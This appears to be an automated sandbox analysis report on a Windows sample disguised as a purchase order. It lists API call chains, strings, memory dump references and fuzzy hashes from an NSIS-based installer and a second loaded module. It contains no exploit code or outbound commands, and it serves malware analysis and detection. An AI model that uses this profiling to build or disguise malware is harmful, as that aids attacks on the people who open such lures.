                                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                      • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                      • String ID: F
                                                                                                      • API String ID: 941294808-1304234792
                                                                                                      • Opcode ID: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                                                                      • Instruction ID: fcf32cd20748a1213536d9d4e972d5f65e682a1af5e7fde79162f5b09e182029
                                                                                                      • Opcode Fuzzy Hash: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                                                                      • Instruction Fuzzy Hash: D2418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF561AA1A0C738EA51DFA5
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404684
                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 004046AE
                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0040475F
                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 0040476A
                                                                                                      • lstrcmpiW.KERNEL32(004271A0,004226E8,00000000,?,?), ref: 0040479C
                                                                                                      • lstrcatW.KERNEL32(?,004271A0), ref: 004047A8
                                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA
                                                                                                        • Part of subcall function 00405708: GetDlgItemTextW.USER32(?,?,00000400,004047F1), ref: 0040571B
                                                                                                        • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 0040623F
                                                                                                        • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                                                                        • Part of subcall function 004061DC: CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 00406253
                                                                                                        • Part of subcall function 004061DC: CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 00406266
                                                                                                      • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487B
                                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404896
                                                                                                      • SetDlgItemTextW.USER32(00000000,00000400,004206A8), ref: 0040490F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                      • String ID: A$&B
                                                                                                      • API String ID: 2246997448-2586977930
                                                                                                      • Opcode ID: 721fa909628c388d9eed4d059dc136074f5db6b4ff511665bfd1b1201094e888
                                                                                                      • Instruction ID: 6e37369fe6ef7f71d764005b1086c215e28ed7130f32df1ae996be3c53d44702
                                                                                                      • Opcode Fuzzy Hash: 721fa909628c388d9eed4d059dc136074f5db6b4ff511665bfd1b1201094e888
                                                                                                      • Instruction Fuzzy Hash: A79170F1900219EBDB10AFA1DC85AAF77B8EF85714F10443BF601B62D1D77C9A418B69
                                                                                                      APIs
                                                                                                      • ___free_lconv_mon.LIBCMT ref: 37007D06
                                                                                                        • Part of subcall function 370090BA: _free.LIBCMT ref: 370090D7
                                                                                                        • Part of subcall function 370090BA: _free.LIBCMT ref: 370090E9
                                                                                                        • Part of subcall function 370090BA: _free.LIBCMT ref: 370090FB
                                                                                                        • Part of subcall function 370090BA: _free.LIBCMT ref: 3700910D
                                                                                                        • Part of subcall function 370090BA: _free.LIBCMT ref: 3700911F
                                                                                                        • Part of subcall function 370090BA: _free.LIBCMT ref: 37009131
                                                                                                        • Part of subcall function 370090BA: _free.LIBCMT ref: 37009143
                                                                                                        • Part of subcall function 370090BA: _free.LIBCMT ref: 37009155
                                                                                                        • Part of subcall function 370090BA: _free.LIBCMT ref: 37009167
                                                                                                        • Part of subcall function 370090BA: _free.LIBCMT ref: 37009179
                                                                                                        • Part of subcall function 370090BA: _free.LIBCMT ref: 3700918B
                                                                                                        • Part of subcall function 370090BA: _free.LIBCMT ref: 3700919D
                                                                                                        • Part of subcall function 370090BA: _free.LIBCMT ref: 370091AF
                                                                                                      • _free.LIBCMT ref: 37007CFB
                                                                                                        • Part of subcall function 3700571E: HeapFree.KERNEL32(00000000,00000000,?,3700924F,?,00000000,?,00000000,?,37009276,?,00000007,?,?,37007E5A,?), ref: 37005734
                                                                                                        • Part of subcall function 3700571E: GetLastError.KERNEL32(?,?,3700924F,?,00000000,?,00000000,?,37009276,?,00000007,?,?,37007E5A,?,?), ref: 37005746
                                                                                                      • _free.LIBCMT ref: 37007D1D
                                                                                                      • _free.LIBCMT ref: 37007D32
                                                                                                      • _free.LIBCMT ref: 37007D3D
                                                                                                      • _free.LIBCMT ref: 37007D5F
                                                                                                      • _free.LIBCMT ref: 37007D72
                                                                                                      • _free.LIBCMT ref: 37007D80
                                                                                                      • _free.LIBCMT ref: 37007D8B
                                                                                                      • _free.LIBCMT ref: 37007DC3
                                                                                                      • _free.LIBCMT ref: 37007DCA
                                                                                                      • _free.LIBCMT ref: 37007DE7
                                                                                                      • _free.LIBCMT ref: 37007DFF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                      • String ID:
                                                                                                      • API String ID: 161543041-0
                                                                                                      • Opcode ID: f7dbfba64d2765795683c5b4f92f5ceef69a9d79713e29f13d1faa00e923c0d8
                                                                                                      • Instruction ID: 263c59e433a89f9f2d0c157573922eef8421f2d08e817d75d35dcbeb18e1d40e
                                                                                                      • Opcode Fuzzy Hash: f7dbfba64d2765795683c5b4f92f5ceef69a9d79713e29f13d1faa00e923c0d8
                                                                                                      • Instruction Fuzzy Hash: 53316BB5600644EFFF219A78EA44B66B7FAEF00370F5054AEE848D7150DE39A980DF15
                                                                                                      APIs
                                                                                                      • GetTickCount.KERNEL32 ref: 00402DD0
                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEC
                                                                                                        • Part of subcall function 00405BB4: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BB8
                                                                                                        • Part of subcall function 00405BB4: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 00402E35
                                                                                                      • GlobalAlloc.KERNEL32(00000040,00409230), ref: 00402F7C
                                                                                                      Strings
                                                                                                      • Null, xrefs: 00402EB5
                                                                                                      • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC5
                                                                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403013
                                                                                                      • Inst, xrefs: 00402EA3
                                                                                                      • Error launching installer, xrefs: 00402E0C
                                                                                                      • soft, xrefs: 00402EAC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                      • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                      • API String ID: 2803837635-787788815
                                                                                                      • Opcode ID: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                                                                      • Instruction ID: b2cc58b1aa553f56ba66d3b0850f03698e33e3340d89f7fe3e9d1fe3a0eb5287
                                                                                                      • Opcode Fuzzy Hash: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                                                                      • Instruction Fuzzy Hash: 43610371941205ABDB209FA4DD85B9E3BB8EB04354F20447BF605B72D2C7BC9E418BAD
                                                                                                      APIs
                                                                                                      • GetVersion.KERNEL32(00000000,004216C8,?,00405229,004216C8,00000000,00000000,00000000), ref: 0040602D
                                                                                                      • GetSystemDirectoryW.KERNEL32(004271A0,00000400), ref: 004060AB
                                                                                                      • GetWindowsDirectoryW.KERNEL32(004271A0,00000400), ref: 004060BE
                                                                                                      • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004060FA
                                                                                                      • SHGetPathFromIDListW.SHELL32(?,004271A0), ref: 00406108
                                                                                                      • CoTaskMemFree.OLE32(?), ref: 00406113
                                                                                                      • lstrcatW.KERNEL32(004271A0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406137
                                                                                                      • lstrlenW.KERNEL32(004271A0,00000000,004216C8,?,00405229,004216C8,00000000,00000000,00000000), ref: 00406191
                                                                                                      Strings
                                                                                                      • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406131
                                                                                                      • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406079
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                      • API String ID: 900638850-730719616
                                                                                                      • Opcode ID: e03ee4e1462f3c7bda9b94e6fe8d7db5edd62b66dd87b3b0d45524ad71c1dce3
                                                                                                      • Instruction ID: 5a47950f0b5222037037379568de6f858daa6aaa62ae53bcd4b1bc7075dc7fd7
                                                                                                      • Opcode Fuzzy Hash: e03ee4e1462f3c7bda9b94e6fe8d7db5edd62b66dd87b3b0d45524ad71c1dce3
                                                                                                      • Instruction Fuzzy Hash: DE611571A00105ABDF209F24CC40AAF37A5EF55314F52C13BE956BA2E1D73D4AA2CB5E
                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 370059EA
                                                                                                        • Part of subcall function 3700571E: HeapFree.KERNEL32(00000000,00000000,?,3700924F,?,00000000,?,00000000,?,37009276,?,00000007,?,?,37007E5A,?), ref: 37005734
                                                                                                        • Part of subcall function 3700571E: GetLastError.KERNEL32(?,?,3700924F,?,00000000,?,00000000,?,37009276,?,00000007,?,?,37007E5A,?,?), ref: 37005746
                                                                                                      • _free.LIBCMT ref: 370059F6
                                                                                                      • _free.LIBCMT ref: 37005A01
                                                                                                      • _free.LIBCMT ref: 37005A0C
                                                                                                      • _free.LIBCMT ref: 37005A17
                                                                                                      • _free.LIBCMT ref: 37005A22
                                                                                                      • _free.LIBCMT ref: 37005A2D
                                                                                                      • _free.LIBCMT ref: 37005A38
                                                                                                      • _free.LIBCMT ref: 37005A43
                                                                                                      • _free.LIBCMT ref: 37005A51
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 776569668-0
                                                                                                      • Opcode ID: 742f73e1a921d6086ba0042b3ac0c1348b1cafc77541453aabb35b26904d0422
                                                                                                      • Instruction ID: 9f46928fe6b8102eabaa4eeea6b8317b4f7bbc569975c543719b7d1410290c50
                                                                                                      • Opcode Fuzzy Hash: 742f73e1a921d6086ba0042b3ac0c1348b1cafc77541453aabb35b26904d0422
                                                                                                      • Instruction Fuzzy Hash: 4011A4BA520548FFEB11DF98DA45CDD3FA9EF04260B4540E1BD088B221DA35EF50AF85
                                                                                                      APIs
                                                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 37001D1B
                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 37001D37
                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37001D4B
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37001D58
                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37001D72
                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37001D7D
                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37001D8A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                      • String ID:
                                                                                                      • API String ID: 1454806937-0
                                                                                                      • Opcode ID: aa6690e0d38c62fa0c1d2e7f166be9f42b5de516c805379f4265f952f355b406
                                                                                                      • Instruction ID: 1e9961ae5ad945b7101226cdb793255b88ce0bef47609fdf777f7120f017bcee
                                                                                                      • Opcode Fuzzy Hash: aa6690e0d38c62fa0c1d2e7f166be9f42b5de516c805379f4265f952f355b406
                                                                                                      • Instruction Fuzzy Hash: 7621FCB594121CAFE7109BA0CC8DFEF76ECFB08365F0105A5F525E2140D6789E468E71
                                                                                                      APIs
                                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 0040421E
                                                                                                      • GetSysColor.USER32(00000000), ref: 0040423A
                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00404246
                                                                                                      • SetBkMode.GDI32(?,?), ref: 00404252
                                                                                                      • GetSysColor.USER32(?), ref: 00404265
                                                                                                      • SetBkColor.GDI32(?,?), ref: 00404275
                                                                                                      • DeleteObject.GDI32(?), ref: 0040428F
                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404299
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 2320649405-0
                                                                                                      • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                      • Instruction ID: b52404dbcc62fb778985b33cde271554a932a1fc376a4a1675ca0a40f23ca1f0
                                                                                                      • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                      • Instruction Fuzzy Hash: B821A4B1A04704ABCB219F68DD08B4B7BF8AF80700F04896DFD91E22E1C338E804CB65
                                                                                                      APIs
                                                                                                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,37009C07,?,00000000,?,00000000,00000000), ref: 370094D4
                                                                                                      • __fassign.LIBCMT ref: 3700954F
                                                                                                      • __fassign.LIBCMT ref: 3700956A
                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 37009590
                                                                                                      • WriteFile.KERNEL32(?,?,00000000,37009C07,00000000,?,?,?,?,?,?,?,?,?,37009C07,?), ref: 370095AF
                                                                                                      • WriteFile.KERNEL32(?,?,00000001,37009C07,00000000,?,?,?,?,?,?,?,?,?,37009C07,?), ref: 370095E8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 1324828854-0
                                                                                                      • Opcode ID: ab809530a4d5d0917aa1ac36cced87f098c3b51862f8ae7d96540ee9d386d69f
                                                                                                      • Instruction ID: 4414f36068d37b02f1e6959def70abe4b6aa9d2bb43b00b083e1d4be3c2a49ad
                                                                                                      • Opcode Fuzzy Hash: ab809530a4d5d0917aa1ac36cced87f098c3b51862f8ae7d96540ee9d386d69f
                                                                                                      • Instruction Fuzzy Hash: F45195B5910205AFEB00CFA8C895BEEBBF4EF09320F15415AE595F7281D674A941CF61
                                                                                                      APIs
                                                                                                      • ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                                                                        • Part of subcall function 00405C37: ReadFile.KERNEL32(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                                                                        • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                                                      • String ID: 9
                                                                                                      • API String ID: 1149667376-2366072709
                                                                                                      • Opcode ID: 13182ff9c3515e99dde9a7f361e17df10afd981257497e4f41ca39f28698b78d
                                                                                                      • Instruction ID: 34008a6f5bb5370994306dbe4266d00811a1d2e87b5126a94146f67fdcf6739f
                                                                                                      • Opcode Fuzzy Hash: 13182ff9c3515e99dde9a7f361e17df10afd981257497e4f41ca39f28698b78d
                                                                                                      • Instruction Fuzzy Hash: 0E51E771E04209ABDF24DF94DE88AAEB779FF04304F50443BE511B62D0D7B99A42CB69
                                                                                                      APIs
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 3700339B
                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 370033A3
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 37003431
                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 3700345C
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 370034B1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                      • Opcode ID: 149c4eca7f2733c7e94c653e60e03d9f2dc411cc81d9b77c20958392e37025dd
                                                                                                      • Instruction ID: e5bdea232fcd4b72636e3628556bb75feeed90e12688b4809465e8b44f42bc20
                                                                                                      • Opcode Fuzzy Hash: 149c4eca7f2733c7e94c653e60e03d9f2dc411cc81d9b77c20958392e37025dd
                                                                                                      • Instruction Fuzzy Hash: 27418478A002089BEB02CF78CC8469EFBE5BF49334F5081D9D915AB251DB75AA15CF91
                                                                                                      APIs
                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                                                                      • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                                                                      • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 3294113728-0
                                                                                                      • Opcode ID: 175540e7daea46f04fdcb39c2d6b9fb6ccbbe72b81495e9a418fab8b18cc96be
                                                                                                      • Instruction ID: c76d0c3f0677147b44531d70e17f5e21854c5a6159b3e076b4812541e28699f2
                                                                                                      • Opcode Fuzzy Hash: 175540e7daea46f04fdcb39c2d6b9fb6ccbbe72b81495e9a418fab8b18cc96be
                                                                                                      • Instruction Fuzzy Hash: C931BF72C00118BBDF11AFA5CE49DAF7E79EF04324F20423AF510762E1C6796E418BA9
                                                                                                      APIs
                                                                                                      • lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                                                                      • lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                                                                      • lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                                                                      • SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                      • String ID:
                                                                                                      • API String ID: 2531174081-0
